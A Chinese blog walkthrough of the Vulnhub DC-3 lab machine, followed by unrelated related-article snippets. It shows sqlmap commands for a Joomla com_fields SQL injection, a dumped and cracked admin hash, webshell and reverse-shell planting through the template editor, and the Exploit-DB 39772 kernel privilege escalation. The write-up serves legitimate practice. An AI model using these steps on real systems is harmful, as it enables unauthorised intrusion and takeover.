Vulnhub-DC-3 靶机复现完整过程

news2024/12/24 10:25:07
啰嗦两句:
提权之前完成是一个月前做的,当时在提权处出了点问题就搁置了,今天才完成,所以IP地址可能会会有变化
注意:后续出现的IP地址为192.168.200.55同样是靶机IP地址,若本文能有帮助到你的地方,不胜荣幸。

一、搭建环境

1.工具

攻击机:kali(192.168.200.14)
靶机:DC-3 (未知)

2.注意

攻击机和靶机的网络连接方式要相同,另外DC-1的网络连接方式我这里采用NAT模式,是与kali的网络连接模式相同的(当然亦可以选用桥接模式)

DC-1网络设计
点击高级后可以查看DC-1的靶机MAC地址,便于扫描IP时识别

二、信息收集

1.扫描同网段下的存活主机方法

靶机dc-3的MAC地址,根据MAC地址判断IP地址
image.png
其一:

arp-scan -l 

image.png
其二:

nmap -sP 192.168.200.0/24 -T4

image.png
其三:

natdiscover 

image.png

2.扫描目标IP开放端口

nmap -sV -p- 192.168.200.8 
#-sV  扫描目标主机端口上运行的软件信息
#-p-  扫描全部端口0-65535

image.png
可以看到此站点,只开启了80端口

3.扫描后台目录

利用dirsearch工具,可与看到administrator这个目录,应该是后台
image.png

4.指纹收集

登录网站
一个著名的CMS系统
image.png
左侧的英文翻译为:
这一次,只有1个flag,一个切入点,没有任何线索。 要获得该标志,您显然必须获得root权限(提权)。 你如何成为根取决于你——显然,还有系统。 祝你好运,我希望你喜欢这个小挑战 。

使用joomscan进行扫描

joomscan -u http://192.168.200.8/

joomscan 安装方法

sudo apt-get install joomscan

image.png
一般的:可以根据框架版本去百度搜索它相关的漏洞,先登录后台目录
image.png
百度搜索后,可以发现千篇一律的sql漏洞
image.png
利用KILI工具查找漏洞
image.png
查看文件、
image.png

5.后台爆破

image.png
sqlmap列出数据库库名
sqlmap -u “http://192.168.200.8/index.php ?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
根据提供的SQLmap构建的payload

image.png

sqlmap列出数据库joomladb下的所有表名
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering]
image.png
发现#_users表
列出users表的字段类型
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]
#__users 里的信息
image.png
确定账户名 账号密码一般为“username,password”
爆数据
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --dbms mysql -D joomladb -T ‘#__users’ -C id,name,password,username --dump
image.png

 $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #哈希加密

使用kali中的join工具进行解密

vi admin.txt      #编辑 将密文写入
john admin.txt    #破解

image.png
破解后得到登录密码为:snoopy 账号:admin
登录后台
image.png

三、漏洞探测

上传Webshell

可以找到网站源码,而模板里的php文件可编辑。
image.png
Joomla后台可编辑模板,利用这个功能,在template下面创建一个 test.php,写入一句话,蚁剑成功连接

image.png

image.png

image.png
当时上传一句话木马的路径如下,此时是可以浏览网站目录和打开虚拟终端的。
image.png

image.png
模板问及那所在路径(直接访问当前文件夹,均可以获取当前文件夹的内容)

http://192.168.200.8/templates/beez3/html/

image.png

反弹shell

在/templates/beez3模板里上传一个反弹shell的文件,记住上传路径,文件由自己创建,本文的文件名shell.php
image.png

反弹shell成功
image.png

利用EXP

searchsploit工具查找Ubuntu 16.04的提权,发现一个“拒绝服务漏洞”,可以用来提权

searchsploit ubuntu 16.04

image.png
查看漏洞,下载EXP

cp /usr/share/exploitdb/exploits/linux/local/39772.txt  shell.txt
cat shelll.txt

文件内容提供了EXP网址
image.png

下载(这步在靶机中实现,这步骤操作失误)
image.png
解压文件

unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit

image.png
image.png
image.png

提权

编译代码

./compile.sh   #执行脚本,编译文件

image.png
提权,获取root权限

./doubleput  #执行提权文件

略微等待一会儿
image.png
image.png

文章参考:https://blog.csdn.net/weixin_43583637/article/details/101554815

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1174297.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Flutter 07 框架和三棵树(Widgets、Elements和RenderObjects)

一、Flutter框架的整体结构: Flutter是Google推出并开源的跨平台开发框架,主打跨平台、高保真、高性能。开发者可以通过Dart语 言开发Flutter应用,一套代码同时运行在ios和Android平台。不仅如此,Flutter还支持Web、桌面、嵌 入应…

论文阅读——What Can Human Sketches Do for Object Detection?(cvpr2023)

论文:https://openaccess.thecvf.com/content/CVPR2023/papers/Chowdhury_What_Can_Human_Sketches_Do_for_Object_Detection_CVPR_2023_paper.pdf 代码:What Can Human Sketches Do for Object Detection? (pinakinathc.me) 一、 Baseline SBIR Fram…

按键开发环境搭建

雷电模拟器 创建虚拟机 2.设置root权限 打开按键精灵连接虚拟机 开启悬浮 mumu模拟器操作 查找端口方法 adb connect 127.0.0.1:16416 设置-应用-所有应用-按键精灵-开启悬浮 步骤二:开启root 处理未root:中途如果有如下未root的情况&#x…

基于单片机的超声波测距仪

收藏和点赞,您的关注是我创作的动力 文章目录 概要 一、本课题研究的主要内容二、超声波测距仪的整体方案2.2 超声波测距仪设计原理 三、超声波测距仪系统硬件电路的设计3.1 超声波测距仪的基本结构 四、 超声波测距仪系统的软件设计4.1 主程序软件设计仿真 五、结…

从信号中去除 60 Hz 杂声

美国和其他几个国家/地区的交流电以 60 Hz 的频率振荡。这些振荡通常会破坏测量结果,必须将其减去。 在存在 60 Hz 电力线噪声的情况下,研究模拟仪器的输入的开环电压。电压采样频率为 1 kHz。 load openloop60hertz, openLoop openLoopVoltage;Fs 10…

一文详解:传统企业如何把进销存管理流程搬到线上?

进销存管理是企业管理的核心流程之一,它有助于提高效率、降低成本、增加盈利,同时确保客户满意度,这对于企业的长期成功和竞争力至关重要。但在信息化转型的浪潮下,很多企业的传统进销存流程却遇到不少问题。 如果你也在考虑把进…

JavaEE平台技术——Spring和Spring Boot

JavaEE平台技术——Spring和Spring Boot 1. 控制反转1.1. IoC是什么1.2. IoC能做什么1.3. IoC和DI 2. SpringBean对象定义3. Spring容器4. SpringBoot 在观看这个之前,大家请查阅前序内容。 😀JavaEE的渊源 😀😀JavaEE平台技术——…

【Unity基础】7.动画状态参数

【Unity基础】7.动画状态参数 大家好,我是Lampard~~ 欢迎来到Unity基础系列博客,所学知识来自B站阿发老师~感谢 (一)创建动画状态 (1) 创建动画状态 不好意思各位~最近工作比较忙,稍微耽误了这两周的博客。话…

【Mybatis小白从0到90%精讲】09:Mybatis动态SQL:if、where、set标签

文章目录 前言一、if 标签二、where 标签三、set 标签前言 动态SQL 是 Mybatis的亮点功能之一,如果你经历过 拼接SQL 的繁琐痛苦,那么你就能切身感受到动态SQL到底有多爽!真香哈~ 另外,Mybatis将动态SQL设计的如此自然,让人看看就能理解和接受,我想这也是Mybaits如此深…

智慧城市排水系统,管网水位监测仪怎么监测

地下排水管网应用于城市的多个环境之中,比如排放雨水,污水或者是地表水等,总之是在维护城市的安全运行,并且保护城市地下生命线处于正常状态。但是一旦排水系统面对各种极端天气,便有可能会突发安全事故,导…

仿写知乎日报第三周

新学到的 本周新学习了FMDB数据库,并对Masonry的使用有了更近一步的了解,还了解了cell的自适应高度 FMDB数据库的介绍和使用:iOS——FMDB的介绍与使用 cell自适应高度和Mansonry自动布局 本周写了评论区,在写评论区的时候&…

WebSocket Day02 : 握手连接

前言 握手连接是WebSocket建立通信的第一步,通过客户端和服务器之间的一系列握手操作,确保了双方都支持WebSocket协议,并达成一致的通信参数。握手连接的过程包括客户端发起握手请求、服务器响应握手请求以及双方完成握手连接。完成握手连接后…

非线性【SVM】的创建和使用

先来绘制散点图: from sklearn.datasets import make_circles X,y make_circles(100, factor0.1, noise.1) # 100个样本,factor:内圈和外圈的距离之比,noise:噪声 X.shape y.shape plt.scatter(X[:,0],X[:,1],cy,s50,cmap"rainbow&qu…

Python基础入门例程44-NP44 判断列表是否为空(条件语句)

最近的博文: Python基础入门例程43-NP43 判断布尔值(条件语句)-CSDN博客 Python基础入门例程42-NP42 公式计算器(运算符)-CSDN博客 Python基础入门例程41-NP41 二进制位运算(运算符)-CSDN博客…

【斗罗二】木槿被打脸,二级魂导师反击木槿,霍雨浩遭遇挖墙角

Hello,小伙伴们,我是小郑继续为大家深度解析国漫资讯。 深度爆料,《斗罗大陆2绝世唐门》21集最新内容,新生考核结束后,戴华斌的内心对霍雨浩的怨念并没有随着时间的流逝而消散,反而像燎原之火一样越演越烈。他始终耿耿…

UE5——源码阅读——1

UE启动 hInInstance :项目实例 hPrevInstance:项目上一个实例 pCmdLine:参数 nCmdShow:窗口显示 TRACE_BOOKMARK(TEXT(“WinMain.Enter”));:UE用来追踪记录的函数,用于标记应用程序在执行过程中一些特定的…

初识rust

调试下rust 的执行流程 参考: 认识 Cargo - Rust语言圣经(Rust Course) 新建一个hello world 程序: fn main() {println!("Hello, world!"); }用IDA 打开exe,并加载符号: 根据字符串找到主程序入口: 双击…

设计模式_策略模式

策略模式 介绍 设计模式定义案例问题堆积在哪里解决办法策略模式对算法进现封装,抽象 如:IF elseIF 一大堆 可以配合工厂模式使用炼丹炉里做饭 要求 菜谱 和 食材可配置问题在可配置 菜谱封装菜谱 然后抽象菜谱,为了统一使用方法 类图 Cai…

初阶JavaEE(14)表白墙程序

接上次博客:初阶JavaEE(13)(安装、配置:Smart Tomcat;访问出错怎么办?Servlet初识、调试、运行;HttpServlet:HttpServlet;HttpServletResponse)-C…

Navicat15更改字体后中文注释显示问题解决办法

Navicat中文注释显示问题解决办法 解决办法: 1 2 3